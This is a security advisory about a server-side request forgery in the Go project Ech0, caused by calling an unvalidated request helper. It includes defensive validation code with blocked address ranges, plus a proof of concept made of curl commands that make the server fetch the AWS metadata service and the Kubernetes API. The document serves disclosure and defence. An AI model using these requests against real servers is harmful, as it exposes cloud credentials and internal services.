PT-2026-41599 · Go · Github.Com/Lin-Snow/Ech0
Published 2026-05-07 · Updated 2026-05-07
| Metric | Value |
|---|---|
| CVSS v3.1 base score | 7.7 (High) |
| Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N |
Summary

The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 sends its request with httpUtil.SendRequest, which has no SSRF protection, instead of httpUtil.SendSafeRequest, which validates the target with ValidatePublicHTTPURL and blocks private IP ranges. An authenticated user can therefore make the server issue requests to arbitrary URLs, including internal services and cloud metadata endpoints.

Details
In internal/service/connect/connect.go, the fetchPeerConnectInfo function builds the peer URL from a user-supplied connection URL and sends the request with SendRequest:

```go
func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
	url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
	resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)
	// ...
}
```

SendRequest performs no URL validation at all. The codebase already has SendSafeRequest at internal/util/http/http.go:228-281, which applies ValidatePublicHTTPURL (private IP blocking) before sending, but fetchPeerConnectInfo does not call it.

Called from:
- Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)
- Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)
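The difference between SendRequest and SendSafeRequest is the whole bug, so it is worth seeing what a ValidatePublicHTTPURL-style check has to cover. The following is an added example and not Ech0's code: validatePublicHTTPURL, isBlockedIP, safeControl, newSafeClient and the hosts peer.example and rebind.example are assumptions made for the illustration. It goes beyond the single case on this page in two ways: it normalises IPv4-mapped IPv6 literals such as ::ffff:169.254.169.254, and it re-checks the address inside the dialer, which closes the DNS-rebinding window that a plain validate-then-request pattern leaves open.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"syscall"
	"time"
)

// Added example, not Ech0's code: a public-URL validator plus a dialer hook
// that re-checks the resolved address at connect time.

// blockedNets are ranges a server-side request must never reach: "this
// network", RFC 1918, CGNAT, loopback, link-local (which covers the
// 169.254.169.254 cloud metadata address), and the IPv6 equivalents.
var blockedNets = mustParseCIDRs(
	"0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
	"169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
	"::/128", "::1/128", "fc00::/7", "fe80::/10",
)

func mustParseCIDRs(cidrs ...string) []*net.IPNet {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

// isBlockedIP first folds IPv4-mapped IPv6 (::ffff:169.254.169.254) down to
// IPv4; without that the IPv4 ranges above would never match such a literal.
func isBlockedIP(ip net.IP) bool {
	if v4 := ip.To4(); v4 != nil {
		ip = v4
	}
	for _, n := range blockedNets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// lookupFunc abstracts DNS so the check can be exercised offline.
type lookupFunc func(host string) ([]net.IP, error)

// validatePublicHTTPURL is the hypothetical pre-request check: http(s) only,
// a non-empty host, and every address the host resolves to must be public.
func validatePublicHTTPURL(rawURL string, lookup lookupFunc) error {
	u, err := url.Parse(rawURL)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname()
	if host == "" {
		return errors.New("empty host")
	}
	var ips []net.IP
	if ip := net.ParseIP(host); ip != nil {
		ips = []net.IP{ip}
	} else if ips, err = lookup(host); err != nil {
		return err
	}
	if len(ips) == 0 {
		return fmt.Errorf("%s resolved to no addresses", host)
	}
	for _, ip := range ips {
		if isBlockedIP(ip) {
			return fmt.Errorf("%s resolves to non-public address %s", host, ip)
		}
	}
	return nil
}

// safeControl runs inside net.Dialer just before connect, on the address the
// resolver actually produced, so redirects and late DNS changes are caught too.
func safeControl(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host)
	if ip == nil || isBlockedIP(ip) {
		return fmt.Errorf("dial to %s refused: non-public address", address)
	}
	return nil
}

// newSafeClient wires the hook into an http.Client. Proxy is deliberately left
// nil: with a proxy the dialer would only ever see the proxy's address.
func newSafeClient(timeout time.Duration) *http.Client {
	d := &net.Dialer{Timeout: timeout, Control: safeControl}
	return &http.Client{Timeout: timeout, Transport: &http.Transport{DialContext: d.DialContext}}
}

func main() {
	// Constructed resolver stand-in: one honest peer and one rebinding host.
	lookup := func(host string) ([]net.IP, error) {
		switch host {
		case "peer.example":
			return []net.IP{net.ParseIP("203.0.113.10")}, nil
		case "rebind.example":
			return []net.IP{net.ParseIP("203.0.113.10"), net.ParseIP("10.0.0.5")}, nil
		}
		return nil, errors.New("no such host")
	}
	for _, raw := range []string{
		"https://peer.example/api/connect",
		"http://169.254.169.254/latest/meta-data/instance-id",
		"http://[::ffff:127.0.0.1]/api/connect",
		"http://rebind.example/api/connect",
		"file:///etc/passwd",
	} {
		fmt.Printf("%-55s -> %v\n", raw, validatePublicHTTPURL(raw, lookup))
	}
	_, err := newSafeClient(5 * time.Second).Get("http://169.254.169.254/latest/meta-data/")
	fmt.Println("dialer hook:", err)
}
```

The pre-request check alone is a time-of-check/time-of-use gap: an attacker-controlled name can resolve to 203.0.113.10 during validation and to 10.0.0.5 a second later when the client dials. Putting the same isBlockedIP test in the dialer's Control hook means every connection the transport opens, including ones that follow a 302 to an internal host, is checked against the address that is really being connected to.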
PoC

```bash
# 1. Add a connection pointing at the AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}'

# 2. Trigger the SSRF via the health check
curl -H "Authorization: Bearer <token>" \
  "https://ech0.example.com/api/connects/health"
# Returns the AWS EC2 instance ID
```

Or, for Kubernetes:

```bash
curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}'
```

Impact
- Confidentiality: the SSRF can reach internal services, cloud metadata (AWS IMDSv1, GCE metadata) and the Kubernetes API from the server's network position
- CWE-918: Server-Side Request Forgery (SSRF)
Fix

Replace the httpUtil.SendRequest call in fetchPeerConnectInfo with httpUtil.SendSafeRequest so that the peer URL passes through ValidatePublicHTTPURL before any request is made; the SSRF exists only because the unsafe variant is used.
Weakness Enumeration
Related identifiers
Affected products
Github.Com/Lin-Snow/Ech0